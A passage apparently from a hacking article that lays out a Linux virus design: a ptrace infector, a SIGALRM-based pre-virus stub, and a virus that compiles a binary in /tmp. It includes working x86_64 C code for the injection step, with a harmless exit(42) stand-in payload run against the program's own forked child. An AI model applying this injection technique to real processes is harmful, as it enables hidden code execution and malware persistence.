Informative Information for the Uninformed
The Algorithm

Having the motives, tools and knowledge, here's the plan:

Infector:
---------
 * Attach to process
 > Wait for process to stop
 > Query process registers
 > Calculate previous stack page beginning
 > Store current EIP
 > Inject pre-virus and virus code
 > Set EIP to pre-virus code
 > Detach from process

Pre-Virus:
----------
 * Register SIGALRM signal
 > Schedule SIGALRM (14 secs)
 > Give control back to process

Virus:
------
 * SIGALRM handler invoked
 > Check for /tmp/fluffy
 > Create fluffy.c
 > Compile fluffy.c
 > Remove /tmp/fluffy.c
 > Chmod /tmp/fluffy
 > Jmp to pre-virus code

The infection is divided into two steps. First, the infector injects the virus and the pre-virus code into the target process and then sets the process's EIP to point at the pre-virus code. Second, the pre-virus code, running on its own inside the infected process, registers a SIGALRM handler, computing the virus's location itself to use as the signal callback, schedules a SIGALRM and passes control back to the process. Once the signal is caught, the virus kicks in as the signal handler.
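The Infector half of the plan, as an added example that is not code from the original text: it is written for x86_64 Linux (so RIP, RSP and orig_rax where the page says EIP and ESP), replaces the virus with a benign stub that makes the victim exit with status 42, and goes beyond the page in two places: the code is written over a nop block in the injector's own text segment rather than into the stack page below ESP (which a non-executable stack would refuse to run), and the register write cancels the kernel's syscall restart, without which the redirect of RIP is silently undone. The victim process, the landing pad and the payload bytes are all constructed for the example; the landing pad address is only valid in the victim because the victim is a fork() of the injector.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>
#ifndef __x86_64__
#error "written for x86_64 Linux: RIP/RSP/orig_rax where the page says EIP/ESP"
#endif

/* Stand-in for the virus (constructed here, not fluffy.c): exit(42), so the
 * injector can see in the victim's exit status whether the code ran. */
static const unsigned char payload[] = {
    0xb8, 0x3c, 0x00, 0x00, 0x00, /* mov eax, 60 (SYS_exit) */
    0xbf, 0x2a, 0x00, 0x00, 0x00, /* mov edi, 42 (exit status) */
    0x0f, 0x05                    /* syscall */
};

/* Landing pad for the injected code: 64 bytes of nops in our own text. The
 * victim is a fork() of this process so the address is valid there too
 * (assumption; a foreign target would need /proc/<pid>/maps). The page uses
 * the stack page below ESP instead, which a modern NX stack refuses to run. */
__attribute__((noinline, used)) static void landing_pad(void)
{
    __asm__ volatile(".fill 64, 1, 0x90");
}

/* Copy len bytes into the tracee a word at a time with PTRACE_POKETEXT; the
 * trailing partial word is read first so the bytes after it survive. */
static int poke_bytes(pid_t pid, unsigned long addr, const unsigned char *src, size_t len)
{
    for (size_t off = 0; off < len;) {
        size_t n = len - off < sizeof(long) ? len - off : sizeof(long);
        long word = 0;
        if (n < sizeof(long)) {
            errno = 0;
            word = ptrace(PTRACE_PEEKTEXT, pid, (void *)(addr + off), NULL);
            if (word == -1 && errno) return -1;
        }
        memcpy(&word, src + off, n); /* little-endian: low bytes first */
        if (ptrace(PTRACE_POKETEXT, pid, (void *)(addr + off), (void *)word) == -1)
            return -1;
        off += n;
    }
    return 0;
}

/* The infector steps of the plan: attach, wait for the stop, query registers,
 * inject, point RIP at the code, detach. Returns 0, or -1 with errno set. */
static int infect(pid_t pid)
{
    struct user_regs_struct regs;
    int status;
    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1) return -1;
    if (waitpid(pid, &status, 0) == -1 || !WIFSTOPPED(status)) return -1;
    if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) == -1) return -1;
    /* regs.rip is the "current EIP" the plan stores so a payload can hand
     * control back; this payload exits, so nothing jumps there. */
    unsigned long code = (unsigned long)landing_pad;
    if (poke_bytes(pid, code, payload, sizeof payload) == -1) return -1;
    /* The victim was interrupted inside pause(). On resume the kernel would
     * restart that syscall by rewinding RIP two bytes, wrecking the redirect;
     * orig_rax = -1 says there is no syscall to restart (GDB does the same
     * whenever it moves the PC). */
    regs.rip = code;
    regs.orig_rax = (unsigned long long)-1;
    if (ptrace(PTRACE_SETREGS, pid, NULL, &regs) == -1) return -1;
    /* Detach with signal 0: the SIGSTOP from ATTACH is discarded and the
     * victim resumes at RIP, i.e. inside the payload. */
    return ptrace(PTRACE_DETACH, pid, NULL, NULL) == -1 ? -1 : 0;
}

/* Fork a victim idling in pause(), infect it, and return what the payload made
 * it exit with: 42 when the injected code ran; -1 when the kernel refused
 * PTRACE_ATTACH (Yama ptrace_scope or seccomp policy, not an injector bug);
 * another negative value on any other failure. */
int run_demo(void)
{
    pid_t pid = fork();
    if (pid == -1) return -2;
    if (pid == 0)
        for (;;) pause(); /* victim: idle like a daemon waiting for work */
    usleep(100000);       /* let the victim reach pause() */
    if (infect(pid) == -1) {
        int err = errno;
        kill(pid, SIGKILL);
        waitpid(pid, NULL, 0);
        return err == EPERM ? -1 : -2;
    }
    int status;
    if (waitpid(pid, &status, 0) == -1) return -2;
    if (WIFEXITED(status)) return WEXITSTATUS(status);
    return WIFSIGNALED(status) ? -100 - WTERMSIG(status) : -2;
}

int main(void)
{
    int r = run_demo();
    printf("victim exited with %d (42 means the injected code ran)\n", r);
    return r == 42 ? 0 : 1;
}
```

Build with gcc -O2 -Wall and run it; it prints the victim's exit status. A result of -1 means PTRACE_ATTACH was refused by policy: check /proc/sys/kernel/yama/ptrace_scope (a value of 1 still allows tracing your own descendants, which is why the demo forks its victim; 2 and 3 do not). The orig_rax step is the part that is easy to get wrong: without it the kernel restarts the interrupted pause() by subtracting two from whatever RIP you set, so the victim resumes two bytes before the injected code.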